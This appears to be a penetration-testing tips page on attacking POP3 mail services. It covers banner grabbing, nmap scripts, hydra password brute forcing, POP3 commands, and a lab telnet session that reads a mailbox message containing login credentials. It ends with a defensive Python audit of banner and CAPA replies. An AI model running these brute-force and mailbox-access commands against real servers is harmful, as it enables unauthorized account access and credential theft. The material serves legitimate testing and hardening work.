[Penetration Testing Tips] POP3 Protocol Penetration Testing
Banner grabbing
nc -nv <IP> 110
nmap POP3 script scan
nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p <PORT> <IP>
POP3 brute forcing
You can use hydra or xhydra. hydra-wizard provides a command-line wizard for configuring the run.
hydra -s PORT -l USERNAME -p PASSWORD -e nsr -t 22 IP pop3
- PORT: port number used by the POP3 service
- USERNAME: a single username
- PASSWORD: a single password
- IP: address of the POP3 server
hydra -s PORT -L USERNAME_LIST -P PASSWORD_LIST -e nsr -t 22 IP pop3
- PORT: port number used by the POP3 service
- USERNAME_LIST: file of usernames
- PASSWORD_LIST: file of passwords
- IP: address of the POP3 server
POP command line
POP commands:
USER uid        Log in as "uid"
PASS password   Substitute "password" for your actual password
STAT            List number of messages, total mailbox size
LIST            List messages and sizes
RETR n          Show message n
DELE n          Mark message n for deletion
RSET            Undo any changes
QUIT            Logout (expunges messages if no RSET)
TOP msg n       Show first n lines of message number msg
CAPA            Get capabilities
Logging in to a POP mailbox from the command line
Using telnet
telnet IP PORT
- IP: IP address of the POP service
- PORT: port number used by the POP service
Using nc
nc IP PORT
- IP: IP address of the POP service
- PORT: port number used by the POP service
Example
root@kali:~# telnet $ip 110
+OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
USER billydean
+OK
PASS password
+OK Welcome billydean
list
+OK 2 1807
1 786
2 1021
retr 1
+OK Message follows
From: jamesbrown@motown.com
Dear Billy Dean,
Here is your login for remote desktop ... try not to forget it this time!
username: billydean
password: PA$$W0RD!Z
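
From the defender's side, the banner and CAPA output collected in the steps above show what a listener gives away. The following is an added example, not part of the original page: it parses POP3 multi-line replies and reports version disclosure, missing STLS, and login mechanisms advertised before TLS. The CAPA replies and all function names are constructed for illustration; only the banner string is taken from the session above.

```python
import re

# Constructed sample data, not a capture. The banner text is the one shown in the
# session on this page; the CAPA replies use RFC 2449 framing with made-up contents.
SAMPLE_BANNER = b"+OK beta POP3 server (JAMES POP3 Server 2.3.2) ready\r\n"
SAMPLE_CAPA = b"+OK Capability list follows\r\nTOP\r\nUSER\r\nSASL PLAIN LOGIN\r\n.\r\n"
SAMPLE_CAPA_TLS = b"+OK\r\nTOP\r\nUIDL\r\nSTLS\r\nIMPLEMENTATION ExampleMailer\r\n.\r\n"


def parse_multiline(raw):
    """Split a POP3 multi-line reply into (status_line, body_lines)."""
    lines = raw.decode("ascii", "replace").split("\r\n")
    status, body = lines[0], []
    if not status.startswith("+OK"):
        return status, body  # -ERR replies carry no body
    for line in lines[1:]:
        if line == ".":  # a lone dot terminates the reply
            return status, body
        body.append(line[1:] if line.startswith(".") else line)  # undo dot-stuffing
    raise ValueError("multi-line reply is missing its terminating '.'")


def parse_capa(raw):
    """Return {CAPABILITY: [args]} from a CAPA reply (empty if CAPA was refused)."""
    caps = {}
    for line in parse_multiline(raw)[1]:
        if line.strip():
            tag, *args = line.split()
            caps[tag.upper()] = [a.upper() for a in args]
    return caps


def audit(banner, capa_raw, tls_wrapped=False):
    """Hardening findings for one listener, from its greeting and CAPA reply."""
    caps, findings = parse_capa(capa_raw), []
    if re.search(r"\d+\.\d+", banner.decode("ascii", "replace")):
        findings.append("banner discloses a version string")
    if "IMPLEMENTATION" in caps:
        findings.append("CAPA IMPLEMENTATION discloses server software")
    if not tls_wrapped:  # plain port 110 listener rather than implicit TLS
        if "STLS" not in caps:
            findings.append("no STLS: the session cannot be upgraded to TLS")
        if "USER" in caps:
            findings.append("USER/PASS advertised before TLS")
        if {"PLAIN", "LOGIN"} & set(caps.get("SASL", [])):
            findings.append("SASL PLAIN/LOGIN advertised before TLS")
    return findings
```

Calling audit(SAMPLE_BANNER, SAMPLE_CAPA) returns four findings for the constructed cleartext listener; pass tls_wrapped=True when the reply was read over an implicit-TLS connection.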